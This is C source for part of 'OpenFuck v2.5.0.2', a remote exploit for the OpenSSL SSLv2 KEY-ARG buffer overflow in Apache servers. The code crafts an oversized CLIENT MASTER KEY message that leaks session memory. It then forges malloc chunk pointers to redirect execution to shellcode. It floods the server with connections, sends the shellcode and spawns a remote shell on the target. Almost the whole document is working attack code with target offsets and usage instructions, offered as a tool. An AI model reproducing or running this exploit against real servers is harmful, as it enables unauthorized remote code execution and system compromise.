void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
|
|
int encrypted_key_length, key_arg_length, record_length;
|
|
unsigned char* p;
|
|
int i;
|
|
EVP_PKEY *pkey=NULL;
|
|
|
|
unsigned char buf[BUFSIZE] =
|
|
"\x02" /* client master key message */
|
|
"\x01\x00\x80" /* cipher kind */
|
|
"\x00\x00" /* clear key length */
|
|
"\x00\x40" /* encrypted key length */
|
|
"\x00\x08"; /* key arg length */
|
|
|
|
p = &buf[10];
|
|
|
|
/* generate a 128 byte master key */
|
|
for (i = 0; i < RC4_KEY_LENGTH; i++) {
|
|
ssl->master_key[i] = (unsigned char) (rand() >> 24);
|
|
}
|
|
|
|
pkey=X509_get_pubkey(ssl->x509);
|
|
if (!pkey) {
|
|
printf("send client master key: No public key in the server certificate\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (pkey->type != EVP_PKEY_RSA) {
|
|
printf("send client master key: The public key in the server certificate is not a RSA key\n");
|
|
exit(1);
|
|
}
|
|
|
|
/* Encrypt the client master key with the server public key and put it in the packet */
|
|
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa,
|
|
RSA_PKCS1_PADDING);
|
|
if (encrypted_key_length <= 0) {
|
|
printf("send client master key: RSA encryption failure\n");
|
|
exit(1);
|
|
}
|
|
|
|
p += encrypted_key_length;
|
|
|
|
if (key_arg_overwrite) {
|
|
/* These 8 bytes fill the key arg array on the server */
|
|
for (i = 0; i < 8; i++) {
|
|
*(p++) = (unsigned char) (rand() >> 24);
|
|
}
|
|
/* This overwrites the data following the key arg array */
|
|
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
|
|
|
|
key_arg_length = 8 + key_arg_overwrite_len;
|
|
}
|
|
else {
|
|
key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
|
|
}
|
|
|
|
p = &buf[6];
|
|
s2n(encrypted_key_length, p);
|
|
s2n(key_arg_length, p);
|
|
|
|
record_length = 10 + encrypted_key_length + key_arg_length;
|
|
send_ssl_packet(ssl, buf, record_length);
|
|
|
|
/* all following messages should be encrypted */
|
|
ssl->encrypted = 1;
|
|
}
|
|
|
|
/* Generate the key material using the algorithm described in the SSL2 specification */
|
|
void generate_key_material(ssl_conn* ssl)
|
|
{
|
|
unsigned int i;
|
|
MD5_CTX ctx;
|
|
unsigned char *km;
|
|
unsigned char c='0';
|
|
|
|
km=ssl->key_material;
|
|
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
|
|
MD5_Init(&ctx);
|
|
|
|
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
|
|
MD5_Update(&ctx,&c,1);
|
|
c++;
|
|
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
|
|
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
|
|
MD5_Final(km,&ctx);
|
|
km+=MD5_DIGEST_LENGTH;
|
|
}
|
|
}
|
|
|
|
/* Generate the RC4 session read and write keys */
|
|
void generate_session_keys(ssl_conn* ssl)
|
|
{
|
|
generate_key_material(ssl);
|
|
|
|
ssl->read_key = &(ssl->key_material[0]);
|
|
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
|
|
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
|
|
|
|
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
|
|
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
|
|
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
|
|
}
|
|
|
|
/* Get a SERVER VERIFY response from the server */
|
|
void get_server_verify(ssl_conn* ssl)
|
|
{
|
|
unsigned char buf[BUFSIZE];
|
|
int len;
|
|
|
|
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
|
|
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
|
|
exit(1);
|
|
}
|
|
if (len != 1 + CHALLENGE_LENGTH) {
|
|
printf("get server verify: Malformed packet size\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
|
|
printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
|
|
exit(1);
|
|
}
|
|
|
|
/* If this works, our decryption key is correct */
|
|
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
|
|
printf("get server verify: Challenge strings don't match\n");
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
/* Send a CLIENT FINISHED message to the server */
|
|
void send_client_finished(ssl_conn* ssl)
|
|
{
|
|
unsigned char buf[BUFSIZE];
|
|
|
|
buf[0] = SSL2_MT_CLIENT_FINISHED;
|
|
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
|
|
|
|
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
|
|
}
|
|
|
|
/* Get a SERVER FINISHED message from the server */
|
|
void get_server_finished(ssl_conn* ssl)
|
|
{
|
|
unsigned char buf[BUFSIZE];
|
|
int len;
|
|
int i;
|
|
|
|
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
|
|
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
|
|
exit(1);
|
|
}
|
|
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
|
|
printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
|
|
exit(1);
|
|
}
|
|
|
|
if (len <= 112 /*17*/) {
|
|
printf("This server is not vulnerable to this attack.\n");
|
|
exit(1);
|
|
}
|
|
cipher = *(int*)&buf[101];
|
|
ciphers = *(int*)&buf[109];
|
|
|
|
printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
|
|
}
|
|
|
|
void get_server_error(ssl_conn* ssl)
|
|
{
|
|
unsigned char buf[BUFSIZE];
|
|
int len;
|
|
|
|
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
|
|
printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
void usage(char* argv0)
|
|
{
|
|
int i;
|
|
|
|
printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
|
|
printf(" target - supported box eg: 0x00\n");
|
|
printf(" box - hostname or IP address\n");
|
|
printf(" port - port for ssl connection\n");
|
|
printf(" -c open N connections. (use range 40-50 if u dont know)\n");
|
|
printf(" \n\n");
|
|
printf(" Supported OffSet:\n");
|
|
|
|
for (i=0; i<=MAX_ARCH; i++) {
|
|
printf("\t0x%02x - %s\n", i, architectures[i].desc);
|
|
}
|
|
printf("\nFuck to all guys who like use lamah ddos\n");
|
|
|
|
exit(1);
|
|
}
|
|
|
|
/* run, code, run */
|
|
int main(int argc, char* argv[])
|
|
{
|
|
char* host;
|
|
int port = 443;
|
|
int i;
|
|
int arch;
|
|
int N = 0;
|
|
ssl_conn* ssl1;
|
|
ssl_conn* ssl2;
|
|
|
|
printf("\n");
|
|
printf("****************************************************************************\n");
|
|
printf("* OpenFuck v 2.5.0.2 ripped from openssl-too-open *\n");
|
|
printf("****************************************************************************\n");
|
|
printf(" * If U know more offset please contact us *\n");
|
|
printf(" * *\n");
|
|
printf("****************************************************************************\n");
|
|
printf("* offset by SPABAM added LSD shellcode *\n");
|
|
printf("* #highsecure *\n");
|
|
printf("* TNX special 2 #uname and #hackarena #SilverLords #isotk #BloodBR *\n");
|
|
printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
|
|
printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
|
|
printf("****************************************************************************\n");
|
|
printf("\n");
|
|
|
|
if ((argc < 3) || (argc > 6))
|
|
usage(argv[0]);
|
|
|
|
/* pff... use getopt next time, fool */
|
|
|
|
sscanf(argv[1], "0x%x", &arch);
|
|
if ((arch < 0) || (arch > MAX_ARCH))
|
|
usage(argv[0]);
|
|
|
|
host = argv[2];
|
|
|
|
if (argc == 4)
|
|
port = atoi(argv[3]);
|
|
else if (argc == 5) {
|
|
if (strcmp(argv[3], "-c"))
|
|
usage(argv[0]);
|
|
N = atoi(argv[4]);
|
|
}
|
|
else if (argc == 6) {
|
|
port = atoi(argv[3]);
|
|
if (strcmp(argv[4], "-c"))
|
|
usage(argv[0]);
|
|
N = atoi(argv[5]);
|
|
}
|
|
|
|
srand(0x31337);
|
|
|
|
/* Open N connections before sending the shellcode. Hopefully this will
|
|
use up all available apache children and the shellcode will be handled
|
|
by a freshly spawned one */
|
|
|
|
for (i=0; i<N; i++) {
|
|
printf("\rConnection... %d of %d", i+1, N);
|
|
fflush(stdout);
|
|
connect_host(host, port);
|
|
usleep(100000);
|
|
}
|
|
|
|
if (N) printf("\n");
|
|
|
|
/* Establish the first connection. Overwrite session id length, and read
|
|
the session contents in the SERVER FINISHED packet. We need the cipher
|
|
and ciphers variables from the session structure to make the shellcode
|
|
work */
|
|
|
|
printf("Establishing SSL connection\n");
|
|
ssl1 = ssl_connect_host(host, port);
|
|
ssl2 = ssl_connect_host(host, port);
|
|
|
|
send_client_hello(ssl1);
|
|
get_server_hello(ssl1);
|
|
send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
|
|
generate_session_keys(ssl1);
|
|
get_server_verify(ssl1);
|
|
send_client_finished(ssl1);
|
|
get_server_finished(ssl1);
|
|
|
|
/* The second connection uses the ciphers variable to get the shellcode
|
|
address and sends the shellcode to server */
|
|
|
|
printf("Ready to send shellcode\n");
|
|
|
|
port = get_local_port(ssl2->sock);
|
|
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
|
|
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
|
|
|
|
/* We must overwrite s->session->cipher with its original value */
|
|
*(int*)&overwrite_next_chunk[156] = cipher;
|
|
|
|
/* The fd and bk pointers of the fake malloc chunk */
|
|
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
|
|
*(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
|
|
|
|
send_client_hello(ssl2);
|
|
get_server_hello(ssl2);
|
|
|
|
send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
|
|
generate_session_keys(ssl2);
|
|
get_server_verify(ssl2);
|
|
|
|
/* overwrite the connection id with random bytes, causing the server to abort the connection */
|
|
for (i = 0; i < ssl2->conn_id_length; i++) {
|
|
ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
|
|
}
|
|
send_client_finished(ssl2);
|
|
get_server_error(ssl2);
|
|
|
|
printf("Spawning shell...\n");
|
|
|
|
sleep(1);
|
|
|
|
sh(ssl2->sock);
|
|
|
|
close(ssl2->sock);
|
|
close(ssl1->sock);
|
|
|
|
return 0;
|
|
}
|
|
|
|
/* It isn't 0day */ |